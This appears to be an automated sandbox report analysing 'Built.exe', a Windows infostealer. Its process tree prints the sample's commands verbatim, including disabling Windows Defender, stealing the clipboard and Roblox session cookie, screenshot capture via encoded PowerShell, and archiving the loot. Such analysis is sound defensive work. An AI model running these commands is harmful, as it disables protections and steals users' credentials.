Analysis

  • max time kernel
    10s
  • max time network
    12s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-11-2024 06:39

General

  • Target

    Built.exe

  • Size

    7.5MB

  • MD5

    9681b16e9b2bc26f93b8147310336eb8

  • SHA1

    332dc32e98d6eeb6ad3804b80dc7e10080b0b5f3

  • SHA256

    5c7026ad4e69c6fc5909613a63be5f5ee298dc5d55ef20cd9639d52afb562afa

  • SHA512

    5dc9da06dee292f2a3f471aa919d902ff45578e5bd273500e1a82e54f1d041b42b206e4d91e0284d15aaefb5bc399afcc8acb66091b805c1390d4ec730a5e821

  • SSDEEP

    196608:zSQCwuLDurErvI9pWjgN3ZdahF0pbH1AY7CtQsNI/Sx3C1J:DAurEUWjqeWxA6nAYJ

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 40 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2388
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2280
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Done', 0, 'Done', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3620
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Done', 0, 'Done', 48+16);close()"
          4⤵
            PID:3228
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‍  .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4136
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‍  .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3468
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:232
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1132
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3832
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3964
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:1252
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2232
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3460
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:452
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3668
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4188
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:2652
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:316
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:1704
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4388
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:4632
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4372
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1012
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lakdgf5l\lakdgf5l.cmdline"
                5⤵
                  PID:2500
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86C4.tmp" "c:\Users\Admin\AppData\Local\Temp\lakdgf5l\CSCD0958DDE8B6640C886E915ABE3D9B599.TMP"
                    6⤵
                      PID:4484
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4588
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2792
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1140
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1688
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:1804
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:1812
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:764
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1176
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:4776
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:1924
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:4536
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1880
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:3128
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      4⤵
                                        PID:1176
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1832
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "getmac"
                                      3⤵
                                        PID:1188
                                        • C:\Windows\system32\getmac.exe
                                          getmac
                                          4⤵
                                            PID:2472
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19682\rar.exe a -r -hp"josue" "C:\Users\Admin\AppData\Local\Temp\jHfYc.zip" *"
                                          3⤵
                                            PID:548
                                            • C:\Users\Admin\AppData\Local\Temp\_MEI19682\rar.exe
                                              C:\Users\Admin\AppData\Local\Temp\_MEI19682\rar.exe a -r -hp"josue" "C:\Users\Admin\AppData\Local\Temp\jHfYc.zip" *
                                              4⤵
                                              • Executes dropped EXE
                                              PID:3404
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                            3⤵
                                              PID:3592
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic os get Caption
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3672
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                              3⤵
                                                PID:1132
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic computersystem get totalphysicalmemory
                                                  4⤵
                                                    PID:392
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                  3⤵
                                                    PID:464
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      4⤵
                                                        PID:3668
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                      3⤵
                                                        PID:4760
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          4⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3040
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                        3⤵
                                                          PID:1476
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic path win32_VideoController get name
                                                            4⤵
                                                            • Detects videocard installed
                                                            PID:2232
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                          3⤵
                                                            PID:1696
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4788

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        8740e7db6a0d290c198447b1f16d5281

                                                        SHA1

                                                        ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                        SHA256

                                                        f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                        SHA512

                                                        d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        bf7b73e38e4a79c2a863a0c331e2000e

                                                        SHA1

                                                        8086254ce77c67e94b9c1380e3f502523399ab9e

                                                        SHA256

                                                        669c79889af6eeb7b96e8050999bf35a9c731b0f03df64496939ebdc043fdad0

                                                        SHA512

                                                        a777d81016f910303546a20f3d1a666fb408fc7c0b442874a910b84317682befc8287c5eb04e5f00fdee156675b699538d9ae3e47dcde24da4f35e68b649e241

